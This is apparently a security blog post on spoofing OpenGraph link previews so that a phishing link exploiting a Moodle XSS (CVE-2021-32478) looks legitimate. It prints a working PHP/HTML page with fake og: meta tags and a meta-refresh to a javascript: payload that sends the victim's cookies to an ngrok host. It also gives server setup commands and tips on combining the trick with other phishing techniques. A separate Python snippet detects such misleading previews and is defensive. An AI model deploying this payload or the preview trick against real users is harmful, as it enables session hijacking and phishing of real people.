Abusing OpenGraph previews

Introduction

While exploiting CVE-2021-32478 I realised that when sharing the link on some social media it doesn't show any preview, while legitimate links in most cases show a brief description or even an image.

After a couple of Google searches I found this post explaining it. Basically, whenever you share a link, the platform makes a GET request to it and extracts some HTML meta tags.

It makes sense that when sharing a link to this particular CVE, which is almost a blank page, the platform can't get that metadata from the page and hence shows no preview.

The idea to trick people into thinking that the link is legitimate consists of creating a malicious web server that serves a PHP file with the needed meta tags and then redirects to the malicious XSS URL.

Setup

Following the instructions on how previews are generated, let's create the evil PHP file to abuse CVE-2021-32478, whose endpoint doesn't show any preview, which may look somewhat suspicious:

<!DOCTYPE html>
<html>
    <head>
    <meta property="og:title" content="Moodle" />
    <meta property="og:url" content="https://redacted.com" />
    <meta property="og:description" content="UDC">
    <meta property="og:image" itemprop="image" content="https://redacted.com/pluginfile.php/1/core_admin/logocompact/300x300/1627037995/01.png"/>
    <meta property="og:type" content="article" />
    <meta property="og:locale" content="es_ES" />
    <meta http-equiv="refresh" content="1;url=https://redacted.com/mod/lti/auth.php?redirect_uri=javascript:document.location=`http://537896773fa6.ngrok.io/cookie.php?c=${document.cookie};`">
    </head>
    <body>
    <link itemprop="thumbnailUrl" href="https://redacted.com/pluginfile.php/1/core_admin/logocompact/300x300/1627037995/01.png">

    <span itemprop="thumbnail" itemscope itemtype="http://schema.org/ImageObject">
        <link itemprop="url" href="https://redacted.com/pluginfile.php/1/core_admin/logocompact/300x300/1627037995/01.png">
    </span>
        <h1>Pwned</h1>
    </body>
</html>

Another interesting detail is that the redirect afterwards has to be done with <meta http-equiv="refresh".../>, because a Location HTTP header caused the preview not to be rendered.
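As an added example (not code from the original post), here is a defender-side check that a link-preview service could run on the fetched HTML before rendering a card: it flags an og:url whose host differs from the host that actually served the page, a meta refresh that sends the browser off-site, and a refresh target that embeds a javascript: URI. The host names in the sample page are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _MetaCollector(HTMLParser):
    """Collects every <meta> tag as a dict of lowercase attribute names."""

    def __init__(self):
        super().__init__()
        self.metas = []

    def handle_starttag(self, tag, attrs):
        if tag == "meta":
            self.metas.append({k.lower(): (v or "") for k, v in attrs})


def _refresh_target(content):
    # A refresh value looks like "1;url=https://..." (delay;url=target).
    m = re.search(r"url\s*=\s*(.+)", content, re.IGNORECASE)
    return m.group(1).strip().strip("'\"") if m else None


def audit_preview(page_url, html):
    """Return warnings about a page whose OpenGraph preview may be misleading."""
    parser = _MetaCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    warnings = []
    for meta in parser.metas:
        if meta.get("property", "").lower() == "og:url":
            og_host = urlparse(meta.get("content", "")).hostname
            if og_host and og_host != page_host:
                warnings.append(f"og:url host {og_host} differs from served host {page_host}")
        if meta.get("http-equiv", "").lower() == "refresh":
            target = _refresh_target(meta.get("content", ""))
            if target:
                target_host = urlparse(target).hostname
                if target_host and target_host != page_host:
                    warnings.append(f"meta refresh redirects off-site to {target_host}")
                if "javascript:" in target.lower():
                    warnings.append("meta refresh target embeds a javascript: URI")
    return warnings


# Constructed sample: a page served from one host that claims another host in og:url.
SAMPLE_URL = "http://attacker.example/"
SAMPLE_HTML = """<html><head>
<meta property="og:title" content="Moodle" />
<meta property="og:url" content="https://school.example" />
<meta http-equiv="refresh" content="1;url=https://school.example/login?next=javascript:void(0)">
</head><body></body></html>"""

if __name__ == "__main__":
    for w in audit_preview(SAMPLE_URL, SAMPLE_HTML):
        print("WARNING:", w)
```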

Start a server with PHP (php -S 0.0.0.0:8000) and ngrok (ngrok http 8000). Now we can share the ngrok link, and here is how it displays on Discord (it works the same way on most common social media):

Display

If you share the link before starting the web server, it won't generate any preview since the platform can't get the meta tags.

Finally we can validate the PoC: when the victim clicks on the URL we can see that we got the cookies:

Cookies

However, sharing an ngrok URL may be even more suspicious than sharing a URL that doesn't show a preview on social media. Still, this could be combined with other phishing techniques.

Note that URL shorteners won't work because they rely on redirects; I tried out maskphish when I realised that behaviour.

WRITTEN BY
ITasahobby
InTernet lover